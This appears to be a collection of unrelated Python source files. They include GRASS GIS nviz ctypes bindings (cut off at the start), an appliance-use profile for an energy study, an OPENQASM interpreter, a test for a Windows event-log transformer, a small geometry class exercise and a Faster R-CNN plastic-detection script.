104 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_create_render_window'): continue Nviz_create_render_window = _lib.Nviz_create_render_window Nviz_create_render_window.argtypes = [POINTER(struct_render_window), POINTER(None), c_int, c_int] Nviz_create_render_window.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/defs/nviz.h: 105 for _lib in six.itervalues(_libs): if not hasattr(_lib, 'Nviz_make_current_render_window'): continue Nviz_make_current_render_window = _lib.Nviz_make_current_render_window Nviz_make_current_render_window.argtypes = [POINTER(struct_render_window)] Nviz_make_current_render_window.restype = c_int break # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/ogsf.h: 30 try: GS_UNIT_SIZE = 1000.0 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 42 try: MAP_OBJ_UNDEFINED = 0 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 43 try: MAP_OBJ_SURF = 1 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 44 try: MAP_OBJ_VOL = 2 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 45 try: MAP_OBJ_VECT = 3 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 46 try: MAP_OBJ_SITE = 4 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 48 try: DRAW_COARSE = 0 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 49 try: DRAW_FINE = 1 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 50 try: DRAW_BOTH = 2 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 53 try: DRAW_QUICK_SURFACE = 1 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 54 try: DRAW_QUICK_VLINES = 2 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 55 try: DRAW_QUICK_VPOINTS = 4 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 56 try: DRAW_QUICK_VOLUME = 8 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 58 try: RANGE = (5 * GS_UNIT_SIZE) except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 59 try: RANGE_OFFSET = (2 * GS_UNIT_SIZE) except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 60 try: ZRANGE = (3 * GS_UNIT_SIZE) except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 61 try: ZRANGE_OFFSET = (1 * GS_UNIT_SIZE) except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 63 try: DEFAULT_SURF_COLOR = 3390463 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 65 try: FORMAT_PPM = 1 except: pass # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 66 try: FORMAT_TIF = 2 except: pass fringe_data = struct_fringe_data # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 78 arrow_data = struct_arrow_data # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 86 scalebar_data = struct_scalebar_data # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 93 render_window = struct_render_window # /Users/cmbarton/grass_source/grass-7.8.3/dist.x86_64-apple-darwin18.7.0/include/grass/nviz.h: 132 # No inserted files
python
# -*- coding: utf-8 -*- """ Created on Mon Sep 13 12:02:28 2021 @author: Clau """ ''' Paper: Energy sufficiency (SDEWES LA 2022) User: School B - LOWLANDS ''' from core import User, np User_list = [] #Definig users SB = User("School type B", 1) User_list.append(SB) #Appliances SB_indoor_bulb = SB.Appliance(SB,12,7,2,120,0.25,30) SB_indoor_bulb.windows([480,780],[840,1140],0.35) SB_outdoor_bulb = SB.Appliance(SB,3,13,1,60,0.2,10) SB_outdoor_bulb.windows([960,1080],[0,0],0.35) SB_TV = SB.Appliance(SB,1,60,2,120,0.1,5, occasional_use = 0.5) SB_TV.windows([480,780],[840,1140],0.2) SB_radio = SB.Appliance(SB,3,4,2,120,0.1,5, occasional_use = 0.5) SB_radio.windows([480,780],[840,1140],0.2) SB_DVD = SB.Appliance(SB,2,8,2,120,0.1,5, occasional_use = 0.5) SB_DVD.windows([480,780],[840,1140],0.2) SB_Freezer = SB.Appliance(SB,1,200,1,1440,0,30, 'yes',3) SB_Freezer.windows([0,1440]) SB_Freezer.specific_cycle_1(200,20,5,10) SB_Freezer.specific_cycle_2(200,15,5,15) SB_Freezer.specific_cycle_3(200,10,5,20) SB_Freezer.cycle_behaviour([580,1200],[0,0],[510,579],[0,0],[0,509],[1201,1440]) SB_PC = SB.Appliance(SB,1,50,2,210,0.1,10) SB_PC.windows([480,780],[840,1140],0.35) SB_Phone_charger = SB.Appliance(SB,3,2,2,180,0.2,5) SB_Phone_charger.windows([480,780],[840,1140],0.35)
python
# encoding: UTF-8 # # Copyright (c) 2015 Facility for Rare Isotope Beams # """ Lattice Model application package. """
python
import fnmatch import os def locate(pattern, root=os.getcwd()): for path, dirs, files in os.walk(root): for filename in [os.path.abspath(os.path.join(path, filename)) for filename in files if fnmatch.fnmatch(filename, pattern)]: yield filename
python
# -*- coding: utf-8 -*- # Copyright 2017 IBM RESEARCH. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """ OPENQASM interpreter. Author: Andrew Cross """ import math import copy from ._unrollerexception import UnrollerException class Unroller(object): """OPENQASM interpreter object that unrolls subroutines and loops.""" def __init__(self, ast, backend=None): """Initialize interpreter's data.""" # Abstract syntax tree from parser self.ast = ast # Backend object self.backend = backend # OPENQASM version number self.version = 0.0 # Dict of qreg names and sizes self.qregs = {} # Dict of creg names and sizes self.cregs = {} # Dict of gates names and properties self.gates = {} # List of dictionaries mapping local parameter ids to real values self.arg_stack = [{}] # List of dictionaries mapping local bit ids to global ids (name,idx) self.bit_stack = [{}] def _process_bit_id(self, node): """Process an Id or IndexedId node as a bit or register type. Return a list of tuples (name,index). """ if node.type == "indexed_id": # An indexed bit or qubit return [(node.name, node.index)] elif node.type == "id": # A qubit or qreg or creg if len(self.bit_stack[-1]) == 0: # Global scope if node.name in self.qregs: return [(node.name, j) for j in range(self.qregs[node.name])] elif node.name in self.cregs: return [(node.name, j) for j in range(self.cregs[node.name])] else: raise UnrollerException("expected qreg or creg name:", "line=%s" % node.line, "file=%s" % node.file) else: # local scope if node.name in self.bit_stack[-1]: return [self.bit_stack[-1][node.name]] else: raise UnrollerException("excepted local bit name:", "line=%s" % node.line, "file=%s" % node.file) def _process_local_id(self, node): """Process an Id node as a local id.""" # The id must be in arg_stack i.e. the id is inside a gate_body id_dict = self.arg_stack[-1] if node.name in id_dict: return float(id_dict[node.name]) else: raise UnrollerException("expected local parameter name:", "line=%s" % node.line, "file=%s" % node.file) def _process_custom_unitary(self, node): """Process a custom unitary node.""" name = node.name if node.arguments is not None: args = self._process_node(node.arguments) else: args = [] bits = [self._process_bit_id(node_element) for node_element in node.bitlist.children] if name in self.gates: gargs = self.gates[name]["args"] gbits = self.gates[name]["bits"] gbody = self.gates[name]["body"] # Loop over register arguments, if any. maxidx = max(map(len, bits)) for idx in range(maxidx): self.arg_stack.append({gargs[j]: args[j] for j in range(len(gargs))}) # Only index into register arguments. element = list(map(lambda x: idx * x, [len(bits[j]) > 1 for j in range(len(bits))])) self.bit_stack.append({gbits[j]: bits[j][element[j]] for j in range(len(gbits))}) self.backend.start_gate(name, [self.arg_stack[-1][s] for s in gargs], [self.bit_stack[-1][s] for s in gbits]) if not self.gates[name]["opaque"]: self._process_children(gbody) self.backend.end_gate(name, [self.arg_stack[-1][s] for s in gargs], [self.bit_stack[-1][s] for s in gbits]) self.arg_stack.pop() self.bit_stack.pop() else: raise UnrollerException("internal error undefined gate:", "line=%s" % node.line, "file=%s" % node.file) def _process_gate(self, node, opaque=False): """Process a gate node. If opaque is True, process the node as an opaque gate node. """ self.gates[node.name] = {} de = self.gates[node.name] de["opaque"] = opaque de["n_args"] = node.n_args() de["n_bits"] = node.n_bits() if node.n_args() > 0: de["args"] = [element.name for element in node.arguments.children] else: de["args"] = [] de["bits"] = [c.name for c in node.bitlist.children] if opaque: de["body"] = None else: de["body"] = node.body self.backend.define_gate(node.name, copy.deepcopy(de)) def _process_cnot(self, node): """Process a CNOT gate node.""" id0 = self._process_bit_id(node.children[0]) id1 = self._process_bit_id(node.children[1]) if not(len(id0) == len(id1) or len(id0) == 1 or len(id1) == 1): raise UnrollerException("internal error: qreg size mismatch", "line=%s" % node.line, "file=%s" % node.file) maxidx = max([len(id0), len(id1)]) for idx in range(maxidx): if len(id0) > 1 and len(id1) > 1: self.backend.cx(id0[idx], id1[idx]) elif len(id0) > 1: self.backend.cx(id0[idx], id1[0]) else: self.backend.cx(id0[0], id1[idx]) def _process_binop(self, node): """Process a binary operation node.""" operation = node.children[0] lexpr = node.children[1] rexpr = node.children[2] if operation == '+': return self._process_node(lexpr) + self._process_node(rexpr) elif operation == '-': return self._process_node(lexpr) - self._process_node(rexpr) elif operation == '*': return self._process_node(lexpr) * self._process_node(rexpr) elif operation == '/': return self._process_node(lexpr) / self._process_node(rexpr) elif operation == '^': return self._process_node(lexpr) ** self._process_node(rexpr) else: raise UnrollerException("internal error: undefined binop", "line=%s" % node.line, "file=%s" % node.file) def _process_prefix(self, node): """Process a prefix node.""" operation = node.children[0] expr = node.children[1] if operation == '+': return self._process_node(expr) elif operation == '-': return -self._process_node(expr) else: raise UnrollerException("internal error: undefined prefix", "line=%s" % node.line, "file=%s" % node.file) def _process_measure(self, node): """Process a measurement node.""" id0 = self._process_bit_id(node.children[0]) id1 = self._process_bit_id(node.children[1]) if len(id0) != len(id1): raise UnrollerException("internal error: reg size mismatch", "line=%s" % node.line, "file=%s" % node.file) for idx, idy in zip(id0, id1): self.backend.measure(idx, idy) def _process_if(self, node): """Process an if node.""" creg = node.children[0].name cval = node.children[1] self.backend.set_condition(creg, cval) self._process_node(node.children[2]) self.backend.drop_condition() def _process_external(self, n): """Process an external function node n.""" op = n.children[0].name expr = n.children[1] dispatch = { 'sin': math.sin, 'cos': math.cos, 'tan': math.tan, 'exp': math.exp, 'ln': math.log, 'sqrt': math.sqrt } if op in dispatch: return dispatch[op](self._process_node(expr)) else: raise UnrollerException("internal error: undefined external", "line=%s" % n.line, "file=%s" % n.file) def _process_children(self, node): """Call process_node for all children of node.""" for c in node.children: self._process_node(c) def _process_node(self, node): """Carry out the action associated with node n.""" if node.type == "program": self._process_children(node) elif node.type == "qreg": self.qregs[node.name] = int(node.index) self.backend.new_qreg(node.name, int(node.index)) elif node.type == "creg": self.cregs[node.name] = int(node.index) self.backend.new_creg(node.name, int(node.index)) elif node.type == "id": return self._process_local_id(node) elif node.type == "int": # We process int nodes when they are leaves of expressions # and cast them to float to avoid, for example, 3/2 = 1. return float(node.value) elif node.type == "real": return float(node.value) elif node.type == "indexed_id": # We should not get here. raise UnrollerException("internal error n.type == indexed_id:", "line=%s" % node.line, "file=%s" % node.file) elif node.type == "id_list": # We process id_list nodes when they are leaves of barriers. return [self._process_bit_id(node_children) for node_children in node.children] elif node.type == "primary_list": # We should only be called for a barrier. return [self._process_bit_id(m) for m in node.children] elif node.type == "gate": self._process_gate(node) elif node.type == "custom_unitary": self._process_custom_unitary(node) elif node.type == "universal_unitary": args = tuple(self._process_node(node.children[0])) qid = self._process_bit_id(node.children[1]) for element in qid: self.backend.u(args, element) elif node.type == "cnot": self._process_cnot(node) elif node.type == "expression_list": return [self._process_node(node_children) for node_children in node.children] elif node.type == "binop": return self._process_binop(node) elif node.type == "prefix": return self._process_prefix(node) elif node.type == "measure": self._process_measure(node) elif node.type == "magic": self.version = float(node.children[0]) self.backend.version(node.children[0]) elif node.type == "barrier": ids = self._process_node(node.children[0]) self.backend.barrier(ids) elif node.type == "reset": id0 = self._process_bit_id(node.children[0]) for idx in range(len(id0)): self.backend.reset(id0[idx]) elif node.type == "if": self._process_if(node) elif node.type == "opaque": self._process_gate(node, opaque=True) elif node.type == "external": return self._process_external(node) else: raise UnrollerException("internal error: undefined node type", node.type, "line=%s" % node.line, "file=%s" % node.file) def set_backend(self, backend): """Set the backend object.""" self.backend = backend def execute(self): """Interpret OPENQASM and make appropriate backend calls.""" if self.backend is not None: self._process_node(self.ast) else: raise UnrollerException("backend not attached")
python
import pytest from beagle.nodes import File, Process from beagle.transformers.evtx_transformer import WinEVTXTransformer @pytest.fixture def transformer() -> WinEVTXTransformer: return WinEVTXTransformer(None) def test_process_creation(transformer): input_event = { "provider_name": "Microsoft-Windows-Security-Auditing", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "eventid_qualifiers": "4688", "version": "1", "level": "0", "task": "13312", "opcode": "0", "keywords": "0x8020000000000000", "timecreated_systemtime": 1_474_410_459, "eventrecordid": "13344", "correlation_activityid": "", "correlation_relatedactivityid": "", "execution_processid": "4", "execution_threadid": "60", "channel": "Security", "computer": "IE10Win7", "security_userid": "", "system": None, "data_name_subjectusersid": "S-1-5-18", "data_name_subjectusername": "IE10WIN7$", "data_name_subjectdomainname": "WORKGROUP", "data_name_subjectlogonid": "0x00000000000003e7", "data_name_newprocessid": "0x00000dec", "data_name_newprocessname": "C:\\Windows\\System32\\dllhost.exe", "data_name_tokenelevationtype": "%%1938", "data_name_processid": "0x00000248", "data_name_commandline": "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}", "eventdata": None, "event": None, } nodes = transformer.transform(input_event) proc: Process = nodes[0] proc_file: File = nodes[1] parent: Process = nodes[2] assert proc.process_id == 3564 assert proc.process_image == "dllhost.exe" assert proc.process_image_path == "C:\\Windows\\System32" assert ( proc.command_line == "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" ) assert proc.host == "IE10Win7" assert parent.process_id == 584 assert proc_file.file_name == "dllhost.exe" assert {"timestamp": 1_474_410_459} in parent.launched[proc]
python
# Exercício 2: Para exercitar nossa capacidade de abstração, vamos modelar algumas partes de um software de geometria. Como poderíamos modelar um objeto retângulo? class Rectangle: def __init__(self, width, height): self._width = width self._height = height def area(self): pass def perimeter(self): pass
python
import os import matplotlib from tqdm import tqdm import numpy as np from model import FasterRCNNVGG16 from trainer import FasterRCNNTrainer from utils.config import opt import data.dataset import data.util import torch from torch.autograd import Variable from torch.utils import data as data_ import torchvision.transforms as transforms from utils import array_tool as at from utils.vis_tool import visdom_bbox import torch.utils.data import torch import PIL import PIL.ImageDraw import PIL.ImageFont #rlimit = resource.getrlimit(resource.RLIMIT_NOFILE) #resource.setrlimit(resource.RLIMIT_NOFILE, (20480, rlimit[1])) class PlasticDetector: def __init__(self, model_path, useGPU, n_fg_classes=2): ''' Creates a new detection model using the weights stored in the file MODEL_PATH and initializes the GPU if USEGPU is set to true. MODEL_PATH: path to a trained detection model. USEGPU: if true, the GPU will be used for faster computations. ''' torch.set_num_threads(1) opt.load_path = model_path self.faster_rcnn = FasterRCNNVGG16(n_fg_class=n_fg_classes, anchor_scales=[1]) self.trainer = FasterRCNNTrainer(self.faster_rcnn, n_fg_class=n_fg_classes) if useGPU: self.trainer = self.trainer.cuda() old_state = self.trainer.load(model_path) self.transforms = transforms.ToTensor() self.useGPU = useGPU def predict_image(self, img, topk): ''' Detects objects in the provided testing images. IMG: PIL image fitting the input of the trained model TOPK: the number of bounding boxes to return. We return the most confident bounding boxes first. RETURNs: (BBOXES, CONFS) where BBOXES is a n x 4 array, where each line corresponds to one bounding box. The bounding box coordniates are stored in the format [x_min, y_min, x_max, y_max], where x corresponds to the width and y to the height. CONFS are the confidence values for each bounding box and are a n x m array. Each row corresponds to the bounding box in the same row of BBOXES and provides the scores for the m classes, that the model was trained to detect. ''' pred_bboxes, pred_labels, pred_scores = self._run_prediction(img) return pred_bboxes[:topk, [1,0,3,2]], pred_scores[:topk] def annotate_image(self, img, topk): ''' Detects objects in the provided testing images. IMG: PIL image fitting the input of the trained model TOPK: the number of bounding boxes to return. We return the most confident bounding boxes first. RETURNS: IMG: a PIL image with the detected bounding boxes annotated as rectangles. ''' pred_bboxes, pred_labels, pred_scores = self._run_prediction(img) draw = PIL.ImageDraw.Draw(img) colors = [(255,0,0),(0,255,0)] for bbox, label, score in zip(pred_bboxes, pred_labels, pred_scores): draw.rectangle(bbox[[1,0,3,2]], outline=colors[label]) #font = PIL.ImageFont.truetype("sans-serif.ttf", 16) #draw.text(bbox[[1,0]],"Sample Text",colors[label]) return img def _run_prediction(self, img): ''' Prepare an input image for CNN processing. IMG: PIL image RETURN: IMG as pytorch tensor in the format 1xCxHxW normalized according to data.dataset.caffe_normalize. ''' img = img.convert('RGB') img = np.asarray(img, dtype=np.float32) if img.ndim == 2: # reshape (H, W) -> (1, H, W) img = img[np.newaxis] else: # transpose (H, W, C) -> (C, H, W) img = img.transpose((2, 0, 1)) proc_img = data.dataset.caffe_normalize(img/255.) tensor_img = torch.from_numpy(proc_img).unsqueeze(0) if self.useGPU: tensor_img = tensor_img.cuda() # This preset filters bounding boxes with a score < 0.7 # and has to be set everytime before using predict() self.faster_rcnn.use_preset('visualize') pred_bboxes, pred_labels, pred_scores = self.faster_rcnn.predict(tensor_img, [(img.shape[1], img.shape[2])]) box_filter = np.array(pred_scores[0]) > 0.7 return pred_bboxes[0][box_filter], pred_labels[0][box_filter], pred_scores[0][box_filter] if __name__ == '__main__': det = PlasticDetector('checkpoints/fasterrcnn_07122125_0.5273599762268979', True) print('Loaded model.') image_path = 'misc/demo.jpg' test_image = PIL.Image.open(image_path) print('Working on image {}'.format(image_path)) print(det.predict_image(test_image, 5)) pred_bboxes, pred_scores = det.predict_image(test_image, 1000) pred_img = visdom_bbox(np.array(test_image.convert('RGB')).transpose((2, 0, 1)), at.tonumpy(pred_bboxes[:,[1,0,3,2]]), at.tonumpy([1 for _ in pred_bboxes]), at.tonumpy(pred_scores), label_names=['Animal', 'BG']) PIL.Image.fromarray((255*pred_img).transpose((1,2,0)).astype(np.uint8)).save('output.jpg') det.annotate_image(test_image, 5).save('output-annotate.jpg')
python